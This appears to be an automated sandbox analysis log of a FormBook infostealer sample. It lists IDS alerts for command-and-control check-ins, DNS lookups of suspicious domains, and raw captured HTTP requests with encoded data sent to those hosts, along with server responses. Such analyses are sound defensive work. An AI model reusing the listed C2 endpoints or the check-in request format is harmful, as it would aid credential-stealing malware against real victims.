Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50011 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49998 -> 104.21.7.187:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50008 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49999 -> 104.21.7.187:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49999 -> 104.21.7.187:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.dating-ml-es.xyz
Source:	DNS query: www.jotchuadog.xyz
Source:	DNS query: www.dating-apps-az-dn5.xyz
Source:	DNS query: www.duyordu.xyz

Source: Joe Sandbox View	IP Address: 146.88.233.115 146.88.233.115
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_010022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_010022EE

Source: global traffic	HTTP traffic detected: GET /uxeg/?QzmLxn8=GxjMbRdPgQzN0XjXcotBxj2TfLFHu8ypKmNa5EKpEZ53nljhiE9yLLvZ3h1y+ouUdvV3oLNcZEK//dGb5DVKRCvqke0RGIMaaR0IR6fpgX04hXePp6sj2hKunKb0dr0WgA==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dating-ml-es.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /jta9/?QzmLxn8=aBG1xMS6m7FLsC69vOjBghyHvRsr9Spq803CGIDTsDF9/H4vSnP1v5yRfjX7qXp247VX2YmsQ7adDqrLglTstOMpeb0fzTtK3PukXCEJIRUSabZMf5f58Y9RP5TmZgvAHg==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jotchuadog.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /oh72/?QzmLxn8=Pixt23+2viDWZBpPGhxHDIEpTcfi8hBLzC3+bNT5RB5HeZd9Pm7rRQlaKMOo7b7Bt+DYNUDGaqLOm1hEaT1x/4L/TlLnmEFiYoRiqhXP6+Cd0hZ8IbffkhN4Yh60b3gTSw==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dating-apps-az-dn5.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /rwyw/?QzmLxn8=tUBKVtCXMBuJNHIpFqiFgzGd5gfnYoalLGMy8MAQ+Jhmg3oHbxgD99VhXdh+qXtYYooesRAVLXyHvMNOjYpU7DvvjDJcGU7DA+zjkrEkOcvVml7XwTJpjMjN9RU0yceV1A==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.smartcongress.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /gae2/?nbd8Y=hfD0&QzmLxn8=otss0rWhIHnhk11bHpADtP94ljsZH/GQRLn65mx6qQBII5Hy/33+pU4ua28O/MN/hGVNt5jqk6AiUDpzXtwsnMZeIw/tUiqDcE1HIDKqYpe8NoemdkbdmjFvjmoOl2KsKw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duyordu.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /9nv0/?QzmLxn8=dWg3C6isp4+VD88a1DBFx9aObA+xTghSwfxMZ+zxeeN7T5xq2T9IGxIaUDChQ5FgGLs4ea44SkIDXQDkT+XV66wbCmoESxYHmimpEhjR9x/TqaeLMadTIOG0BL9hL7PHyQ==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /lnu5/?nbd8Y=hfD0&QzmLxn8=QNT/15ZZU6AsGiWjSRYKkt/6S9anaGtoX8GfFyWC43f2cikt7PUu3WS46j+T51paYxuS3ixH2vbh2sKfAJw3ojfp25nO6F6qHofbl88ReUJsLvfvq1VL21AHNWbpiK3IyQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.108.foundationConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /4woq/?QzmLxn8=ZzFE54Yh+eSeCT8FF0zNBnoZDDByraM682bOLpiy7hQBP+BdXfTm3u46Ly/FvI4MxOK+Clx1PQVPu2KUvv9MKfeNOqebtOdcsMY+XeS2Ki1dxMRhw9VWTBGVxPaM2L4KFw==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wintus.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /d5ko/?QzmLxn8=47Sch4Dsymg0jF3r4GDuCB6kzGYKh0WeL2yhy5BrefofQJ2dMwfirGLwiNRn/0xtXVPtxdeSAw3k3lUcttDNE/CgCPcxlvUG/WK2ZsoqDDwcP3eNWypVGILe8DfKTq90/A==&nbd8Y=hfD0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ampsamkok88.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.dating-ml-es.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jotchuadog.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
Source: global traffic	DNS traffic detected: DNS query: www.smartcongress.net
Source: global traffic	DNS traffic detected: DNS query: www.duyordu.xyz
Source: global traffic	DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic	DNS traffic detected: DNS query: www.108.foundation
Source: global traffic	DNS traffic detected: DNS query: www.wintus.top
Source: global traffic	DNS traffic detected: DNS query: www.ampsamkok88.shop

Source: unknown

HTTP traffic detected: POST /jta9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.jotchuadog.xyzOrigin: http://www.jotchuadog.xyzContent-Length: 208Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.jotchuadog.xyz/jta9/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 51 7a 6d 4c 78 6e 38 3d 58 44 75 56 79 37 43 44 72 71 31 43 75 31 4f 6d 69 2b 75 57 71 51 4b 50 73 46 30 35 76 51 46 68 6a 6e 4f 5a 4f 74 4c 58 69 53 74 7a 6a 48 55 73 4b 30 6a 45 6e 34 48 61 62 45 76 51 32 67 63 71 39 59 4e 56 37 49 6e 58 57 37 48 69 4f 35 4c 44 38 46 72 35 6b 4f 59 64 49 64 64 39 76 41 45 55 35 76 33 64 51 6c 56 56 44 31 45 75 48 5a 6c 4b 4b 4a 43 63 68 76 64 64 49 59 50 6f 44 6b 79 50 53 7a 64 6f 34 52 4c 61 65 4f 4d 57 38 47 73 77 4b 2b 31 58 41 52 66 43 4f 44 53 66 33 4e 68 77 54 4a 37 31 37 59 66 48 34 45 77 68 41 38 71 64 43 4e 2f 39 61 63 6e 55 70 33 4b 67 77 4d 35 45 53 4b 79 4b 67 5a 73 3d Data Ascii: QzmLxn8=XDuVy7CDrq1Cu1Omi+uWqQKPsF05vQFhjnOZOtLXiStzjHUsK0jEn4HabEvQ2gcq9YNV7InXW7HiO5LD8Fr5kOYdIdd9vAEU5v3dQlVVD1EuHZlKKJCchvddIYPoDkyPSzdo4RLaeOMW8GswK+1XARfCODSf3NhwTJ717YfH4EwhA8qdCN/9acnUp3KgwM5ESKyKgZs=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 10 Jan 2025 18:56:47 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 10 Jan 2025 18:56:49 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 10 Jan 2025 18:56:52 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 10 Jan 2025 18:56:54 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 18:57:08 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T18:57:13.4664292Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yc9rRVLoql5pphDcyYNEAPr48UnhYDEC8dpzCVKQQPzxevHcCX5G%2B0jqoeiGQ5gonB9KR2yevPK%2B9Fp7mdt%2BKOJ5%2B0zs16bnmZx6SNippPWms8DwU3c4eCIbvuytbsaRdW8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffee441790218cc-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNL3Kzuy55azJl2LYzroo5Qlt7d6FSgA8DJ8uuT4i1WZdhygk%2FlW9FqG%2BYaVYXGzkDbYh1l6YE0EUx3j%2BrotzxSAP6XQFXlkNF8AEUbmmuWls%2B3r7Io%2BxkKhunoQz2cvci8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffee4517c450f78-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1632&rtt_var=816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCYoqOetX8C4bsXGwam7DuOgetrZ8HpdZ%2F2WlK%2FAd%2FYrYN37zmlQUXbqZuXfF0vW9lXwCcwfl2XyysljH5mIw9AfAN6pksO4enuuiDZu6VxrGXZsI7bJW%2FWjJ25Up%2BY6DX8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffee4616f2c4349-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1739&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAg6ZCE8Tp%2FiefKpnrPzGuIUd%2Bom1uhY%2Ba4RxfLFCpcTjiu%2FJhkAUtySHgj%2B%2FVBYty7GeSB6l%2FMBmlKtVx3B9GQpdqOY9TF86d8W2qY3VCFS319X59D%2BQVcOwK92V2pjkSw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffee47158d543d0-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
